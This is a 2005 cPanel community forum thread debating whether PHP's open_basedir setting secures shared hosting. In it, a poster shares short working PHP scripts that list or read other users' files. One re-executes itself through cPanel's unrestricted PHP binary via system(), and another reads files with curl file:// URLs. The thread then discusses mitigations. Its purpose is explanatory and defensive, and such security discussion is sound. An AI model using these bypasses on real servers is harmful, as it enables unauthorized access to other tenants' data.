The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

php open_basedir pointless?

Discussion in 'General Discussion' started by weaver, Jan 23, 2005.

  1. weaver

    weaver Active Member

    Joined:
    Jan 19, 2005
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    WHM: Main >> Server Setup >> Tweak Security

    Php open_basedir Tweak
    I don't see the point of enabling this unless you are going to disable functions such as system(), passthru(), exec() etc... The reason for this is because cPanel/WHM runs under its own version of php in which php open_basedir is NOT disabled!!

    Example 1:
    PHP:
    <?php
    $directory 
    '/home/'.$_GET['user'].'/public_html';
    $dirhandle opendir($directory);
    while (
    $files readdir($dirhandle)) :
    header('Cache-control: private'."\r\n");
    header('Content-Type: text/plain'."\r\n");
    header('Content-Disposition: inline; filename=dirlist.txt'."\r\n");
    header('Content-transfer-encoding: ascii'."\r\n");
    header('Pragma: no-cache'."\r\n");
    header('Expires: 0'."\r\n\r\n");
    echo 
    $files."\r\n";
    endwhile;
    ?>
    If you were to upload this into public web space with php open_basedir enabled and visit the url, say: http://www.yourdomain.com/script.php?user=cpuser where cpuser = a cPanel username then you will only be allowed to view the contents of that public directory only if you set cpuser as the username associated with yourdomain.com.

    The above is fine, no problem, no risk to security, however...

    Example 2:
    PHP:
    <?php
    if(ini_get('open_basedir')) :
    system('/usr/local/cpanel/3rdparty/bin/php -q '.$_SERVER['SCRIPT_FILENAME'].' '$_GET['user']);
    else :
    if (!isset(
    $_GET['user'])) $_GET['user'] = $argv[1];
    $directory '/home/'.$_GET['user'].'/public_html';
    $dirhandle opendir($directory);
    while (
    $files readdir($dirhandle)) :
    header('Cache-control: private'."\r\n");
    header('Content-Type: text/plain'."\r\n");
    header('Content-Disposition: inline; filename=dirlist.txt'."\r\n");
    header('Content-transfer-encoding: ascii'."\r\n");
    header('Pragma: no-cache'."\r\n");
    header('Expires: 0'."\r\n\r\n");
    echo 
    $files."\r\n";
    endwhile;
    endif;
    ?>
    This example executes the same kind of code except it checks for php open_basedir being enabled and if is, will parse it via the internal cPanel/WHM version of php instead where there is NO php open_basedir restrictions in place :(

    Summary:

    Unless you are going to disable all of PHP's ability to execute external programs or php open_basedir is disabled on cPanel/WHM version of it (will break lots of things including Fantastico) then it seems to me that having this enabled in the first place is pretty pointless?
     
  2. LP-Trel

    LP-Trel Well-Known Member

    Joined:
    Oct 13, 2003
    Messages:
    184
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Nirvana
    While an interesting exercise to show that open_basedir can't be relied on to protect you, this doesn't do anything with safe_mode enabled which is common (in my experience) among people that bother to enable open_basedir.

    Thank you for your work though, this should at least help to scare someone shitless enough to take security half seriously for a day or two. :cool:
     
  3. weaver

    weaver Active Member

    Joined:
    Jan 19, 2005
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    Hopefully enough to enable safe_mode ;)

    However, if curl is installed with php support and it has also been compiled with local file access (often is) then curl doesn't care if php has safe_mode or open_basedir enabled or not :(

    Good way to test:

    PHP:
    <?php
    $ch 
    curl_init("file:///home/cpuser/public_html/index.html");
    $fr curl_exec($ch);
    echo 
    $fr;
    ?>
    A chain is only as strong as its weakest link :eek:
     
    #3 weaver, Jan 24, 2005
    Last edited: Jan 24, 2005
  4. fusioncroc

    fusioncroc Well-Known Member

    Joined:
    Sep 28, 2004
    Messages:
    261
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    U.K.
    but what if system is blocked in php.ini ?
    or the curl command
     
  5. fusioncroc

    fusioncroc Well-Known Member

    Joined:
    Sep 28, 2004
    Messages:
    261
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    U.K.
    And if curl_exec is blocked i suppose it will affect other scripts or will it be ok to block ?
     
  6. weaver

    weaver Active Member

    Joined:
    Jan 19, 2005
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    If safe mode is enabled then system() will already be blocked but regardless of whether it is or not it's useless if curl has been compiled with local file access. If none of your clients require curl then you should recompile php without support for it as disabling curl_exec() is basically disabling curl support for php (would break a lot of client appz on my servers if I disabled it). If you want to offer curl and maintain your security I would recompile curl using the "--disable-file" option in configure. Important: If "--disable-file" is NOT specified (like the default cPanel installation) in the configuration then local file access WILL be enabled and access to files not owned by the user WILL be possible via a curl supported install of php, regardless of what you have disabled/enabled in the php.ini file and regardless of whether you have php open_base directory protection enabled or not!
     
  7. jdonoso

    jdonoso Well-Known Member

    Joined:
    Nov 15, 2004
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    The Third Rock from The Sun!
    How it would break Fantastico? I have Fantastico and open_basedir enabled in my server and no biggie, Fantastico runs fine. Maybe I'm understanding it wrong, sorry if I do. ;) Perhaps you can clear this up a little more.

    Best regards,
     
    #7 jdonoso, Jan 27, 2005
    Last edited: Jan 27, 2005
  8. weaver

    weaver Active Member

    Joined:
    Jan 19, 2005
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    What build of php are you referring to?

    Having open_basedir enabled in Server Setup >> Tweak Security will NOT break Fantastico as Fantastico runs under cPanels/WHM php environment and NOT your web servers.

    Add the open_basedir directive to: /usr/local/cpanel/3rdparty/etc/php.ini and you will understand what I'm talking about! It will also break the cpanelxp2004 theme (if you have it installed) and probably any other php based solution that requires access to multiple directories :eek:

    Do you get the picture now ;)
     
    #8 weaver, Jan 27, 2005
    Last edited: Jan 27, 2005
  9. jdonoso

    jdonoso Well-Known Member

    Joined:
    Nov 15, 2004
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    The Third Rock from The Sun!
    Oh! I see now. But, so why one bother using it, or any other php securities, like phpsuexec, etc. I personally don't like the idea of resorting to have to set safe_mode=on (many hosters don't do it either), for security purposes.

    Thanks for your explanation :)
     
  10. fusioncroc

    fusioncroc Well-Known Member

    Joined:
    Sep 28, 2004
    Messages:
    261
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    U.K.
    well i run open basedir and there was some problems with some scripts but it was just one custom one

    i just want to know blocking curl_exec will that affect any scripts ?
     
  11. weaver

    weaver Active Member

    Joined:
    Jan 19, 2005
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    Blocking curl_exec() will affect any php script that uses curl. If you block the curl_exec() function you basically will not be able to support/offer curl to your clients so you may as well recompile php without curl support, either that or recompile curl using the --disable-file option.
     
  12. weaver

    weaver Active Member

    Joined:
    Jan 19, 2005
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    That's the question I ask myself too ;)

    If you're in the world of commercial hosting, enabling safe_mode will lose you a lot of clients due to the fact that there are so many scripts out there that simply do not work unless safe_mode is switched off. If I switched on safe_mode I would lose custom, simple as that. The safe_mode setting is a quick "dirty fix" that only stops a user doing what he/she could do some other way (see some of my examples). I also think that safe_mode annoys most php developers (myself included) and is also kind of saying to your client: "we don't trust you one little bit"!

    I prefer to keep safe_mode off so my clients may develop their web based applications to full potential and I just keep a close eye on things for any suspicious activities. Sure, I've had the occasional idiot trying to delete stuff/view directories but 99/100 of clients want high quality hosting with no restrictions and as to all of these exploits suposedly closed by safe_mode, open_basedir protection and phpsuexec can be accomplished some other way then who am I to make the hosting market smaller for myself by setting such restrictions?

    Just my two cents :D
     
  13. DigitalN

    DigitalN Well-Known Member

    Joined:
    Sep 23, 2004
    Messages:
    420
    Likes Received:
    1
    Trophy Points:
    18
    I agree with you too ;)

    Keep the server software up to date, take precautions with firewalls, mod_security maybe and other security tweaks, make sure that you don't have wild permissions on system files, keep good backups (pref off server too).

    Getting hung up on these php 'vulnerabilities' (which aren't really vulns, just the way things work) isn't for me, just watch the boxes and do the above, keep up to date and one step ahead at all times and you are as good as you can be and offer your clients hassle free hosting, which after all, why should you let the script kiddies win by going safe_mode (which if you don't turn off the ability to use .htaccess overrides, they can override anyways easily.) and limit your business ?

    There are too many ways in shared hosting to view files, if someone wants to read your /etc/passwd file, it's not going to directly lead to a root compromise - they need to do something else to get that. Secure passwords and policies are what is needed, the list of things to secuure your box is very long, php safe_mode won't make it onto my list anytime soon. :)

    Thank you.
     
  14. fusioncroc

    fusioncroc Well-Known Member

    Joined:
    Sep 28, 2004
    Messages:
    261
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    U.K.
    Thanks i wont be disabling curl_exec
    i' tryied some of those php scripts to view the files they worked until i remembered i entered sytem instead of system in the disable_functions in php.ini
     
Loading...

Share This Page